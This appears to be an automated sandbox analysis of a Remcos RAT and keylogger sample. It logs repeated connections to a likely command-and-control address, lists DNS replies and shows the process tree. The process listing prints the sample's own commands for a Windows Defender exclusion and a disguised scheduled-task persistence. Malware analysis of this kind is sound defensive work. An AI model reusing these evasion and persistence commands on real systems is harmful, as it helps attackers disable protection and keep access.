                                              Dec 17, 2024 20:39:15.575086117 CET498762560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:15.578890085 CET498762560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:15.698950052 CET256049876107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:17.532898903 CET256049876107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:17.534921885 CET498762560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:17.534997940 CET498762560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:17.654699087 CET256049876107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:18.545628071 CET498822560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:18.665319920 CET256049882107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:18.665419102 CET498822560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:18.670346975 CET498822560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:18.790311098 CET256049882107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:20.607161045 CET256049882107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:20.607285976 CET498822560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:20.607417107 CET498822560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:20.727046013 CET256049882107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:21.623910904 CET498912560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:21.743637085 CET256049891107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:21.743736029 CET498912560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:21.750989914 CET498912560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:21.871622086 CET256049891107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:23.685406923 CET256049891107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:23.685542107 CET498912560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:23.685581923 CET498912560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:23.805402994 CET256049891107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:24.701721907 CET498972560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:24.821507931 CET256049897107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:24.821615934 CET498972560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:24.825941086 CET498972560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:24.945902109 CET256049897107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:26.818619967 CET256049897107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:26.818834066 CET498972560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:26.818835020 CET498972560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:26.938447952 CET256049897107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:27.826874971 CET499052560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:27.947788954 CET256049905107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:27.947983980 CET499052560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:27.952862978 CET499052560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:28.072514057 CET256049905107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:29.893240929 CET256049905107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:29.893328905 CET499052560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:29.893505096 CET499052560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:30.013329029 CET256049905107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:30.904865026 CET499152560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:31.031455994 CET256049915107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:31.032773972 CET499152560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:31.037389994 CET499152560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:31.157090902 CET256049915107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:32.970619917 CET256049915107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:32.972717047 CET499152560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:32.972767115 CET499152560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:33.092854977 CET256049915107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:33.983262062 CET499202560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:34.103775024 CET256049920107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:34.103902102 CET499202560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:34.108746052 CET499202560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:34.228666067 CET256049920107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:36.086468935 CET256049920107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:36.088840961 CET499202560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:36.088927031 CET499202560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:36.209831953 CET256049920107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:37.092638016 CET499302560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:37.212315083 CET256049930107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:37.212404013 CET499302560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:37.217279911 CET499302560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:37.337593079 CET256049930107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:39.203283072 CET256049930107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:39.203366995 CET499302560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:39.203432083 CET499302560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:39.323118925 CET256049930107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:39.435775042 CET49701443192.168.2.640.126.53.19
                                              Dec 17, 2024 20:39:39.556096077 CET4434970140.126.53.19192.168.2.6
                                              Dec 17, 2024 20:39:39.556798935 CET49701443192.168.2.640.126.53.19
                                              Dec 17, 2024 20:39:40.217269897 CET499372560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:40.337450981 CET256049937107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:40.340842962 CET499372560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:40.344331026 CET499372560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:40.465711117 CET256049937107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:42.305012941 CET256049937107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:42.305102110 CET499372560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:42.305190086 CET499372560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:42.425285101 CET256049937107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:43.311219931 CET499452560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:43.431019068 CET256049945107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:43.434964895 CET499452560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:43.445947886 CET499452560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:43.566394091 CET256049945107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:45.014173985 CET49705443192.168.2.640.126.53.19
                                              Dec 17, 2024 20:39:45.135083914 CET4434970540.126.53.19192.168.2.6
                                              Dec 17, 2024 20:39:45.139142036 CET49705443192.168.2.640.126.53.19
                                              Dec 17, 2024 20:39:45.378415108 CET256049945107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:45.378721952 CET499452560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:45.378837109 CET499452560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:45.498620033 CET256049945107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:46.399275064 CET499532560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:46.519153118 CET256049953107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:46.519360065 CET499532560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:46.527458906 CET499532560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:46.647214890 CET256049953107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:48.452682018 CET256049953107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:48.456779957 CET499532560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:48.456780910 CET499532560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:48.576678038 CET256049953107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:49.436182022 CET499602560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:49.556054115 CET256049960107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:49.560786963 CET499602560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:49.565581083 CET499602560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:49.685720921 CET256049960107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:51.514800072 CET256049960107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:51.515278101 CET499602560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:51.515279055 CET499602560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:51.635025978 CET256049960107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:52.451896906 CET499692560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:52.574729919 CET256049969107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:52.575028896 CET499692560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:52.584681034 CET499692560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:52.706840992 CET256049969107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:54.514168024 CET256049969107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:54.514301062 CET499692560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:54.514494896 CET499692560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:54.640475988 CET256049969107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:55.420622110 CET499772560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:55.540668011 CET256049977107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:55.543919086 CET499772560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:55.547977924 CET499772560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:55.667742968 CET256049977107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:57.486840010 CET256049977107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:57.486941099 CET499772560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:57.487081051 CET499772560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:57.606965065 CET256049977107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:58.373838902 CET499832560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:58.493638039 CET256049983107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:58.494580030 CET499832560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:58.499320984 CET499832560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:58.620692015 CET256049983107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:00.437944889 CET256049983107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:00.438107014 CET499832560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:00.438317060 CET499832560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:00.558741093 CET256049983107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:01.319947958 CET499922560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:01.439687014 CET256049992107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:01.443099022 CET499922560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:01.448379993 CET499922560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:01.568120003 CET256049992107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:03.398564100 CET256049992107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:03.398647070 CET499922560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:03.398694992 CET499922560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:03.519614935 CET256049992107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:04.239593983 CET499982560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:04.359709978 CET256049998107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:04.362876892 CET499982560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:04.377418995 CET499982560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:04.498581886 CET256049998107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:06.315658092 CET256049998107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:06.319129944 CET499982560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:06.319220066 CET499982560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:06.439130068 CET256049998107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:07.119821072 CET500042560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:07.241405964 CET256050004107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:07.244837046 CET500042560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:07.350189924 CET500042560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:07.471411943 CET256050004107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:09.200018883 CET256050004107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:09.204762936 CET500042560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:09.204848051 CET500042560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:09.325786114 CET256050004107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:09.983185053 CET500102560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:10.103121042 CET256050010107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:10.103219986 CET500102560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:10.106671095 CET500102560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:10.226267099 CET256050010107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:12.072516918 CET256050010107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:12.072762966 CET500102560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:12.072841883 CET500102560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:12.194596052 CET256050010107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:12.811184883 CET500202560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:12.930887938 CET256050020107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:12.931021929 CET500202560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:12.935305119 CET500202560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:13.054959059 CET256050020107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:14.878670931 CET256050020107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:14.880801916 CET500202560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:14.880878925 CET500202560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:15.000735998 CET256050020107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:15.607976913 CET500262560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:15.727797985 CET256050026107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:43.870242119 CET256050068107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:45.735831976 CET256050068107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:45.735940933 CET500682560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:45.736041069 CET500682560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:45.860305071 CET256050068107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:45.951910019 CET500692560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:46.071631908 CET256050069107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:46.075360060 CET500692560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:46.078834057 CET500692560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:46.198286057 CET256050069107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:48.065494061 CET256050069107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:48.065567970 CET500692560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:48.065629959 CET500692560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:48.185224056 CET256050069107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:48.279982090 CET500702560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:48.403342009 CET256050070107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:48.403465033 CET500702560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:48.407149076 CET500702560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:48.531469107 CET256050070107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:50.385267019 CET256050070107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:50.389076948 CET500702560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:50.389076948 CET500702560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:50.508908033 CET256050070107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:50.592493057 CET500712560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:50.712248087 CET256050071107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:50.712990999 CET500712560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:50.716253042 CET500712560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:50.835892916 CET256050071107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:52.656753063 CET256050071107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:52.656816959 CET500712560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:52.656883001 CET500712560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:52.858201981 CET500722560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:52.936346054 CET256050071107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:53.056338072 CET256050072107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:53.057045937 CET500722560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:53.059794903 CET500722560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:53.263989925 CET256050072107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:55.001574039 CET256050072107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:55.005008936 CET500722560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:55.005171061 CET500722560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:55.125019073 CET256050072107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:55.201935053 CET500732560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:55.323467970 CET256050073107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:55.323560953 CET500732560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:55.328398943 CET500732560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:55.449570894 CET256050073107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:57.271996021 CET256050073107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:57.272222042 CET500732560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:57.272222042 CET500732560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:57.391935110 CET256050073107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:57.451847076 CET500742560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:57.572401047 CET256050074107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:57.572674036 CET500742560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:57.575747013 CET500742560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:57.696449995 CET256050074107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:59.539107084 CET256050074107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:59.540966988 CET500742560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:59.540997028 CET500742560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:59.661293983 CET256050074107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:59.717758894 CET500752560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:59.837677956 CET256050075107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:59.837769032 CET500752560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:59.841387033 CET500752560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:59.961390972 CET256050075107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:01.786680937 CET256050075107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:01.786745071 CET500752560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:01.786853075 CET500752560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:01.912431955 CET256050075107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:01.967556953 CET500762560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:02.087204933 CET256050076107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:02.087450981 CET500762560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:02.090277910 CET500762560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:02.210441113 CET256050076107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:04.051667929 CET256050076107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:04.051786900 CET500762560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:04.051786900 CET500762560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:04.173903942 CET256050076107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:04.217573881 CET500772560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:04.576983929 CET256050077107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:04.577234030 CET500772560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:04.580075026 CET500772560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:04.699975014 CET256050077107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:06.517621994 CET256050077107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:06.517761946 CET500772560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:06.517792940 CET500772560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:06.637629986 CET256050077107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:06.687669992 CET500782560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:06.808248043 CET256050078107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:06.808346033 CET500782560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:06.811984062 CET500782560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:06.931510925 CET256050078107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:08.786358118 CET256050078107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:08.786444902 CET500782560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:08.786530018 CET500782560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:08.906239986 CET256050078107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:08.951988935 CET500792560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:09.071787119 CET256050079107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:09.071892023 CET500792560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:09.075342894 CET500792560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:09.196891069 CET256050079107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:11.000874996 CET256050079107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:11.000967026 CET500792560192.168.2.6107.173.4.16
                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                              Dec 17, 2024 20:38:10.596251011 CET | 1.1.1.1 | 192.168.2.6 | 0x6fb9 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
                                              Dec 17, 2024 20:38:10.596251011 CET | 1.1.1.1 | 192.168.2.6 | 0x6fb9 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
                                              Dec 17, 2024 20:38:22.358520031 CET | 1.1.1.1 | 192.168.2.6 | 0x9f3a | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                                              Dec 17, 2024 20:38:22.358520031 CET | 1.1.1.1 | 192.168.2.6 | 0x9f3a | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                                              Dec 17, 2024 20:38:24.846611977 CET | 1.1.1.1 | 192.168.2.6 | 0x547f | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                              Dec 17, 2024 20:38:24.846611977 CET | 1.1.1.1 | 192.168.2.6 | 0x547f | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false

                                              Target ID:0
                                              Start time:14:38:02
                                              Start date:17/12/2024
                                              Path:C:\Users\user\Desktop\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                              Imagebase:0x940000
                                              File size:1'075'712 bytes
                                              MD5 hash:065A6053492ECC989755413D4B9CFFEA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              Target ID:3
                                              Start time:14:38:05
                                              Start date:17/12/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe"
                                              Imagebase:0x390000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:14:38:05
                                              Start date:17/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:14:38:05
                                              Start date:17/12/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp"
                                              Imagebase:0xd50000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
